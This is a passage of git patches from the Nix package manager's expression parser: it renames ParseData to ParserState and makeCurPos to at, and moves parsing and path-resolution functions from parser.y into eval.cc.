- attrs->attrs.emplace(i->symbol, ExprAttrs::AttrDef(e, pos)); - e->setName(i->symbol); - } - } else { - attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, e, pos)); - } -} - - -Formals * ParseData::validateFormals(Formals * formals, PosIdx pos, Symbol arg) -{ - std::sort(formals->formals.begin(), formals->formals.end(), - [] (const auto & a, const auto & b) { - return std::tie(a.name, a.pos) < std::tie(b.name, b.pos); - }); - - std::optional> duplicate; - for (size_t i = 0; i + 1 < formals->formals.size(); i++) { - if (formals->formals[i].name != formals->formals[i + 1].name) - continue; - std::pair thisDup{formals->formals[i].name, formals->formals[i + 1].pos}; - duplicate = std::min(thisDup, duplicate.value_or(thisDup)); - } - if (duplicate) - throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), - .errPos = state.positions[duplicate->second] - }); - - if (arg && formals->has(arg)) - throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), - .errPos = state.positions[pos] - }); - - return formals; -} - - -Expr * ParseData::stripIndentation(const PosIdx pos, - std::vector>> && es) -{ - if (es.empty()) return new ExprString(""); - - /* Figure out the minimum indentation. Note that by design - whitespace-only final lines are not taken into account. (So - the " " in "\n ''" is ignored, but the " " in "\n foo''" is.) */ - bool atStartOfLine = true; /* = seen only whitespace in the current line */ - size_t minIndent = 1000000; - size_t curIndent = 0; - for (auto & [i_pos, i] : es) { - auto * str = std::get_if(&i); - if (!str || !str->hasIndentation) { - /* Anti-quotations and escaped characters end the current start-of-line whitespace. 
*/ - if (atStartOfLine) { - atStartOfLine = false; - if (curIndent < minIndent) minIndent = curIndent; - } - continue; - } - for (size_t j = 0; j < str->l; ++j) { - if (atStartOfLine) { - if (str->p[j] == ' ') - curIndent++; - else if (str->p[j] == '\n') { - /* Empty line, doesn't influence minimum - indentation. */ - curIndent = 0; - } else { - atStartOfLine = false; - if (curIndent < minIndent) minIndent = curIndent; - } - } else if (str->p[j] == '\n') { - atStartOfLine = true; - curIndent = 0; - } - } - } - - /* Strip spaces from each line. */ - auto * es2 = new std::vector>; - atStartOfLine = true; - size_t curDropped = 0; - size_t n = es.size(); - auto i = es.begin(); - const auto trimExpr = [&] (Expr * e) { - atStartOfLine = false; - curDropped = 0; - es2->emplace_back(i->first, e); - }; - const auto trimString = [&] (const StringToken & t) { - std::string s2; - for (size_t j = 0; j < t.l; ++j) { - if (atStartOfLine) { - if (t.p[j] == ' ') { - if (curDropped++ >= minIndent) - s2 += t.p[j]; - } - else if (t.p[j] == '\n') { - curDropped = 0; - s2 += t.p[j]; - } else { - atStartOfLine = false; - curDropped = 0; - s2 += t.p[j]; - } - } else { - s2 += t.p[j]; - if (t.p[j] == '\n') atStartOfLine = true; - } - } - - /* Remove the last line if it is empty and consists only of - spaces. */ - if (n == 1) { - std::string::size_type p = s2.find_last_of('\n'); - if (p != std::string::npos && s2.find_first_not_of(' ', p + 1) == std::string::npos) - s2 = std::string(s2, 0, p + 1); - } - - es2->emplace_back(i->first, new ExprString(std::move(s2))); - }; - for (; i != es.end(); ++i, --n) { - std::visit(overloaded { trimExpr, trimString }, i->second); - } - - /* If this is a single string, then don't do a concatenation. 
*/ - if (es2->size() == 1 && dynamic_cast((*es2)[0].second)) { - auto *const result = (*es2)[0].second; - delete es2; - return result; - } - return new ExprConcatStrings(pos, true, es2); -} - - -PosIdx ParseData::makeCurPos(const ParserLocation & loc) -{ - return state.positions.add(origin, loc.first_line, loc.first_column); -} - -#define CUR_POS data->makeCurPos(*yylocp) - - -} - - -void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * error) +void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error) { throw ParseError({ .msg = hintfmt(error), - .errPos = data->state.positions[data->makeCurPos(*loc)] + .errPos = state->state.positions[state->makeCurPos(*loc)] }); } @@ -339,13 +68,13 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err nix::Formal * formal; nix::NixInt n; nix::NixFloat nf; - StringToken id; // !!! -> Symbol - StringToken path; - StringToken uri; - StringToken str; + nix::StringToken id; // !!! 
-> Symbol + nix::StringToken path; + nix::StringToken uri; + nix::StringToken str; std::vector * attrNames; std::vector> * string_parts; - std::vector>> * ind_string_parts; + std::vector>> * ind_string_parts; } %type start expr expr_function expr_if expr_op @@ -385,24 +114,24 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err %% -start: expr { data->result = $1; }; +start: expr { state->result = $1; }; expr: expr_function; expr_function : ID ':' expr_function - { $$ = new ExprLambda(CUR_POS, data->symbols.create($1), 0, $3); } + { $$ = new ExprLambda(CUR_POS, state->symbols.create($1), 0, $3); } | '{' formals '}' ':' expr_function - { $$ = new ExprLambda(CUR_POS, data->validateFormals($2), $5); } + { $$ = new ExprLambda(CUR_POS, state->validateFormals($2), $5); } | '{' formals '}' '@' ID ':' expr_function { - auto arg = data->symbols.create($5); - $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($2, CUR_POS, arg), $7); + auto arg = state->symbols.create($5); + $$ = new ExprLambda(CUR_POS, arg, state->validateFormals($2, CUR_POS, arg), $7); } | ID '@' '{' formals '}' ':' expr_function { - auto arg = data->symbols.create($1); - $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($4, CUR_POS, arg), $7); + auto arg = state->symbols.create($1); + $$ = new ExprLambda(CUR_POS, arg, state->validateFormals($4, CUR_POS, arg), $7); } | ASSERT expr ';' expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } @@ -412,7 +141,7 @@ expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), - .errPos = data->state.positions[CUR_POS] + .errPos = state->state.positions[CUR_POS] }); $$ = new ExprLet($2, $4); } @@ -426,24 +155,24 @@ expr_if expr_op : '!' 
expr_op %prec NOT { $$ = new ExprOpNot($2); } - | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(data->symbols.create("__sub")), {new ExprInt(0), $2}); } + | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->symbols.create("__sub")), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3})); } - | expr_op AND expr_op { $$ = new ExprOpAnd(data->makeCurPos(@2), $1, $3); } - | expr_op OR expr_op { $$ = new ExprOpOr(data->makeCurPos(@2), $1, $3); } - | expr_op IMPL expr_op { $$ = new ExprOpImpl(data->makeCurPos(@2), $1, $3); } - | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(data->makeCurPos(@2), $1, $3); } + | expr_op '<' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } + | expr_op AND expr_op { $$ = new ExprOpAnd(state->makeCurPos(@2), $1, $3); } + | expr_op OR expr_op { $$ = new ExprOpOr(state->makeCurPos(@2), $1, $3); } + | expr_op IMPL expr_op { 
$$ = new ExprOpImpl(state->makeCurPos(@2), $1, $3); } + | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(state->makeCurPos(@2), $1, $3); } | expr_op '?' attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op - { $$ = new ExprConcatStrings(data->makeCurPos(@2), false, new std::vector >({{data->makeCurPos(@1), $1}, {data->makeCurPos(@3), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__div")), {$1, $3}); } - | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(data->makeCurPos(@2), $1, $3); } + { $$ = new ExprConcatStrings(state->makeCurPos(@2), false, new std::vector >({{state->makeCurPos(@1), $1}, {state->makeCurPos(@3), $3}})); } + | expr_op '-' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } + | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->makeCurPos(@2), $1, $3); } | expr_app ; @@ -466,7 +195,7 @@ expr_select | /* Backwards compatibility: because Nixpkgs has a rarely used function named ‘or’, allow stuff like ‘map or [...]’. 
*/ expr_simple OR_KW - { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, data->symbols.create("or"))}); } + { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, state->symbols.create("or"))}); } | expr_simple ; @@ -476,25 +205,25 @@ expr_simple if ($1.l == s.size() && strncmp($1.p, s.data(), s.size()) == 0) $$ = new ExprPos(CUR_POS); else - $$ = new ExprVar(CUR_POS, data->symbols.create($1)); + $$ = new ExprVar(CUR_POS, state->symbols.create($1)); } | INT_LIT { $$ = new ExprInt($1); } | FLOAT_LIT { $$ = new ExprFloat($1); } | '"' string_parts '"' { $$ = $2; } | IND_STRING_OPEN ind_string_parts IND_STRING_CLOSE { - $$ = data->stripIndentation(CUR_POS, std::move(*$2)); + $$ = state->stripIndentation(CUR_POS, std::move(*$2)); delete $2; } | path_start PATH_END | path_start string_parts_interpolated PATH_END { - $2->insert($2->begin(), {data->makeCurPos(@1), $1}); + $2->insert($2->begin(), {state->makeCurPos(@1), $1}); $$ = new ExprConcatStrings(CUR_POS, false, $2); } | SPATH { std::string path($1.p + 1, $1.l - 2); $$ = new ExprCall(CUR_POS, - new ExprVar(data->symbols.create("__findFile")), - {new ExprVar(data->symbols.create("__nixPath")), + new ExprVar(state->symbols.create("__findFile")), + {new ExprVar(state->symbols.create("__nixPath")), new ExprString(std::move(path))}); } | URI { @@ -502,7 +231,7 @@ expr_simple if (noURLLiterals) throw ParseError({ .msg = hintfmt("URL literals are disabled"), - .errPos = data->state.positions[CUR_POS] + .errPos = state->state.positions[CUR_POS] }); $$ = new ExprString(std::string($1)); } @@ -510,7 +239,7 @@ expr_simple /* Let expressions `let {..., body = ...}' are just desugared into `(rec {..., body = ...}).body'. 
*/ | LET '{' binds '}' - { $3->recursive = true; $$ = new ExprSelect(noPos, $3, data->symbols.create("body")); } + { $3->recursive = true; $$ = new ExprSelect(noPos, $3, state->symbols.create("body")); } | REC '{' binds '}' { $3->recursive = true; $$ = $3; } | '{' binds '}' @@ -526,23 +255,23 @@ string_parts string_parts_interpolated : string_parts_interpolated STR - { $$ = $1; $1->emplace_back(data->makeCurPos(@2), new ExprString(std::string($2))); } - | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } - | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(data->makeCurPos(@1), $2); } + { $$ = $1; $1->emplace_back(state->makeCurPos(@2), new ExprString(std::string($2))); } + | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } + | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(state->makeCurPos(@1), $2); } | STR DOLLAR_CURLY expr '}' { $$ = new std::vector>; - $$->emplace_back(data->makeCurPos(@1), new ExprString(std::string($1))); - $$->emplace_back(data->makeCurPos(@2), $3); + $$->emplace_back(state->makeCurPos(@1), new ExprString(std::string($1))); + $$->emplace_back(state->makeCurPos(@2), $3); } ; path_start : PATH { - Path path(absPath({$1.p, $1.l}, data->basePath.path.abs())); + Path path(absPath({$1.p, $1.l}, state->basePath.path.abs())); /* add back in the trailing '/' to the first segment */ if ($1.p[$1.l-1] == '/' && $1.l > 1) path += "/"; - $$ = new ExprPath(ref(data->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); } | HPATH { if (evalSettings.pureEval) { @@ -552,24 +281,24 @@ path_start ); } Path path(getHome() + std::string($1.p + 1, $1.l - 1)); - $$ = new ExprPath(ref(data->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); } ; ind_string_parts - : ind_string_parts IND_STR { $$ = $1; 
$1->emplace_back(data->makeCurPos(@2), $2); } - | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } + : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $2); } + | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } | { $$ = new std::vector>>; } ; binds - : binds attrpath '=' expr ';' { $$ = $1; data->addAttr($$, std::move(*$2), $4, data->makeCurPos(@2)); delete $2; } + : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->makeCurPos(@2)); delete $2; } | binds INHERIT attrs ';' { $$ = $1; for (auto & i : *$3) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - data->dupAttr(i.symbol, data->makeCurPos(@3), $$->attrs[i.symbol].pos); - auto pos = data->makeCurPos(@3); + state->dupAttr(i.symbol, state->makeCurPos(@3), $$->attrs[i.symbol].pos); + auto pos = state->makeCurPos(@3); $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); } delete $3; @@ -579,48 +308,48 @@ binds /* !!! Should ensure sharing of the expression in $4. 
*/ for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - data->dupAttr(i.symbol, data->makeCurPos(@6), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), data->makeCurPos(@6))); + state->dupAttr(i.symbol, state->makeCurPos(@6), $$->attrs[i.symbol].pos); + $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->makeCurPos(@6))); } delete $6; } - | { $$ = new ExprAttrs(data->makeCurPos(@0)); } + | { $$ = new ExprAttrs(state->makeCurPos(@0)); } ; attrs - : attrs attr { $$ = $1; $1->push_back(AttrName(data->symbols.create($2))); } + : attrs attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($2))); } | attrs string_attr { $$ = $1; ExprString * str = dynamic_cast($2); if (str) { - $$->push_back(AttrName(data->symbols.create(str->s))); + $$->push_back(AttrName(state->symbols.create(str->s))); delete str; } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = data->state.positions[data->makeCurPos(@2)] + .errPos = state->state.positions[state->makeCurPos(@2)] }); } | { $$ = new AttrPath; } ; attrpath - : attrpath '.' attr { $$ = $1; $1->push_back(AttrName(data->symbols.create($3))); } + : attrpath '.' attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($3))); } | attrpath '.' 
string_attr { $$ = $1; ExprString * str = dynamic_cast($3); if (str) { - $$->push_back(AttrName(data->symbols.create(str->s))); + $$->push_back(AttrName(state->symbols.create(str->s))); delete str; } else $$->push_back(AttrName($3)); } - | attr { $$ = new std::vector; $$->push_back(AttrName(data->symbols.create($1))); } + | attr { $$ = new std::vector; $$->push_back(AttrName(state->symbols.create($1))); } | string_attr { $$ = new std::vector; ExprString *str = dynamic_cast($1); if (str) { - $$->push_back(AttrName(data->symbols.create(str->s))); + $$->push_back(AttrName(state->symbols.create(str->s))); delete str; } else $$->push_back(AttrName($1)); @@ -654,8 +383,8 @@ formals ; formal - : ID { $$ = new Formal{CUR_POS, data->symbols.create($1), 0}; } - | ID '?' expr { $$ = new Formal{CUR_POS, data->symbols.create($1), $3}; } + : ID { $$ = new Formal{CUR_POS, state->symbols.create($1), 0}; } + | ID '?' expr { $$ = new Formal{CUR_POS, state->symbols.create($1), $3}; } ; %% @@ -687,7 +416,7 @@ Expr * EvalState::parse( std::shared_ptr & staticEnv) { yyscan_t scanner; - ParseData data { + ParserState state { .state = *this, .symbols = symbols, .basePath = basePath, @@ -698,11 +427,11 @@ Expr * EvalState::parse( Finally _destroy([&] { yylex_destroy(scanner); }); yy_scan_buffer(text, length, scanner); - yyparse(scanner, &data); + yyparse(scanner, &state); - data.result->bindVars(*this, staticEnv); + state.result->bindVars(*this, staticEnv); - return data.result; + return state.result; } From 835a6c7bcfd0b22acc16f31de5fc7bb650d52017 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 266/654] rename ParserState::{makeCurPos -> at} most instances of this being used do not refer to the "current" position, sometimes not even to one reasonably close by. it could also be called `makePos` instead, but `at` seems clear in context. 
--- src/libexpr/lexer.l | 2 +- src/libexpr/parser-state.hh | 4 +-- src/libexpr/parser.y | 60 ++++++++++++++++++------------------- 3 files changed, 33 insertions(+), 33 deletions(-) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index cfd61c90e..fae0e7a85 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -29,7 +29,7 @@ using namespace nix; namespace nix { -#define CUR_POS state->makeCurPos(*yylloc) +#define CUR_POS state->at(*yylloc) static void initLoc(YYLTYPE * loc) { diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index b33311743..167d3f4ae 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -49,7 +49,7 @@ struct ParserState { Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); Expr * stripIndentation(const PosIdx pos, std::vector>> && es); - PosIdx makeCurPos(const ParserLocation & loc); + PosIdx at(const ParserLocation & loc); }; inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) @@ -254,7 +254,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos, return new ExprConcatStrings(pos, true, es2); } -inline PosIdx ParserState::makeCurPos(const ParserLocation & loc) +inline PosIdx ParserState::at(const ParserLocation & loc) { return state.positions.add(origin, loc.first_line, loc.first_column); } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 7ce493df5..7763a72bc 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -45,14 +45,14 @@ YY_DECL; using namespace nix; -#define CUR_POS state->makeCurPos(*yylocp) +#define CUR_POS state->at(*yylocp) void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error) { throw ParseError({ .msg = hintfmt(error), - .errPos = state->state.positions[state->makeCurPos(*loc)] + .errPos = state->state.positions[state->at(*loc)] }); } @@ -158,21 +158,21 @@ expr_op | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new 
ExprVar(state->symbols.create("__sub")), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } - | expr_op AND expr_op { $$ = new ExprOpAnd(state->makeCurPos(@2), $1, $3); } - | expr_op OR expr_op { $$ = new ExprOpOr(state->makeCurPos(@2), $1, $3); } - | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->makeCurPos(@2), $1, $3); } - | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(state->makeCurPos(@2), $1, $3); } + | expr_op '<' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } + | expr_op AND expr_op { $$ = new ExprOpAnd(state->at(@2), $1, $3); } + | expr_op OR expr_op { $$ = new ExprOpOr(state->at(@2), $1, $3); } + | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->at(@2), $1, $3); } + | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(state->at(@2), $1, $3); } | expr_op '?' 
attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op - { $$ = new ExprConcatStrings(state->makeCurPos(@2), false, new std::vector >({{state->makeCurPos(@1), $1}, {state->makeCurPos(@3), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } - | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->makeCurPos(@2), $1, $3); } + { $$ = new ExprConcatStrings(state->at(@2), false, new std::vector >({{state->at(@1), $1}, {state->at(@3), $3}})); } + | expr_op '-' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } + | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->at(@2), $1, $3); } | expr_app ; @@ -216,7 +216,7 @@ expr_simple } | path_start PATH_END | path_start string_parts_interpolated PATH_END { - $2->insert($2->begin(), {state->makeCurPos(@1), $1}); + $2->insert($2->begin(), {state->at(@1), $1}); $$ = new ExprConcatStrings(CUR_POS, false, $2); } | SPATH { @@ -255,13 +255,13 @@ string_parts string_parts_interpolated : string_parts_interpolated STR - { $$ = $1; $1->emplace_back(state->makeCurPos(@2), new ExprString(std::string($2))); } - | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } - | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(state->makeCurPos(@1), $2); } + { $$ = $1; $1->emplace_back(state->at(@2), new 
ExprString(std::string($2))); } + | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->at(@2), $3); } + | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(state->at(@1), $2); } | STR DOLLAR_CURLY expr '}' { $$ = new std::vector>; - $$->emplace_back(state->makeCurPos(@1), new ExprString(std::string($1))); - $$->emplace_back(state->makeCurPos(@2), $3); + $$->emplace_back(state->at(@1), new ExprString(std::string($1))); + $$->emplace_back(state->at(@2), $3); } ; @@ -286,19 +286,19 @@ path_start ; ind_string_parts - : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $2); } - | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->makeCurPos(@2), $3); } + : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(state->at(@2), $2); } + | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(state->at(@2), $3); } | { $$ = new std::vector>>; } ; binds - : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->makeCurPos(@2)); delete $2; } + : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->at(@2)); delete $2; } | binds INHERIT attrs ';' { $$ = $1; for (auto & i : *$3) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - state->dupAttr(i.symbol, state->makeCurPos(@3), $$->attrs[i.symbol].pos); - auto pos = state->makeCurPos(@3); + state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos); + auto pos = state->at(@3); $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); } delete $3; @@ -308,12 +308,12 @@ binds /* !!! Should ensure sharing of the expression in $4. 
*/ for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - state->dupAttr(i.symbol, state->makeCurPos(@6), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->makeCurPos(@6))); + state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos); + $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->at(@6))); } delete $6; } - | { $$ = new ExprAttrs(state->makeCurPos(@0)); } + | { $$ = new ExprAttrs(state->at(@0)); } ; attrs @@ -327,7 +327,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = state->state.positions[state->makeCurPos(@2)] + .errPos = state->state.positions[state->at(@2)] }); } | { $$ = new AttrPath; } From e1aa585964c3d864ebff0030584f3349a539d615 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 267/654] slim down parser.y most EvalState and Expr members defined here could be elsewhere, where they'd be easier to maintain (not being embedded in a file with arcane syntax) and *somewhat* more faithfully placed according to the path of the file they're defined in. --- src/libexpr/eval.cc | 164 ++++++++++++++++++++++++++++++++++++++ src/libexpr/nixexpr.cc | 2 + src/libexpr/parser.y | 176 ----------------------------------------- 3 files changed, 166 insertions(+), 176 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 0659a2173..6eee7cdce 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -20,6 +20,8 @@ #include "gc-small-vector.hh" #include "url.hh" #include "fetch-to-store.hh" +#include "tarball.hh" +#include "flake/flakeref.hh" #include #include @@ -2636,6 +2638,168 @@ void EvalState::printStatistics() } +SourcePath resolveExprPath(SourcePath path) +{ + unsigned int followCount = 0, maxFollow = 1024; + + /* If `path' is a symlink, follow it. This is so that relative + path references work. 
*/ + while (!path.path.isRoot()) { + // Basic cycle/depth limit to avoid infinite loops. + if (++followCount >= maxFollow) + throw Error("too many symbolic links encountered while traversing the path '%s'", path); + auto p = path.parent().resolveSymlinks() + path.baseName(); + if (p.lstat().type != InputAccessor::tSymlink) break; + path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; + } + + /* If `path' refers to a directory, append `/default.nix'. */ + if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) + return path + "default.nix"; + + return path; +} + + +Expr * EvalState::parseExprFromFile(const SourcePath & path) +{ + return parseExprFromFile(path, staticBaseEnv); +} + + +Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv) +{ + auto buffer = path.resolveSymlinks().readFile(); + // readFile hopefully have left some extra space for terminators + buffer.append("\0\0", 2); + return parse(buffer.data(), buffer.size(), Pos::Origin(path), path.parent(), staticEnv); +} + + +Expr * EvalState::parseExprFromString(std::string s_, const SourcePath & basePath, std::shared_ptr & staticEnv) +{ + auto s = make_ref(std::move(s_)); + s->append("\0\0", 2); + return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv); +} + + +Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath) +{ + return parseExprFromString(std::move(s), basePath, staticBaseEnv); +} + + +Expr * EvalState::parseStdin() +{ + //Activity act(*logger, lvlTalkative, "parsing standard input"); + auto buffer = drainFD(0); + // drainFD should have left some extra space for terminators + buffer.append("\0\0", 2); + auto s = make_ref(std::move(buffer)); + return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath(CanonPath::fromCwd()), staticBaseEnv); +} + + +SourcePath EvalState::findFile(const std::string_view path) +{ + return findFile(searchPath, path); +} + 
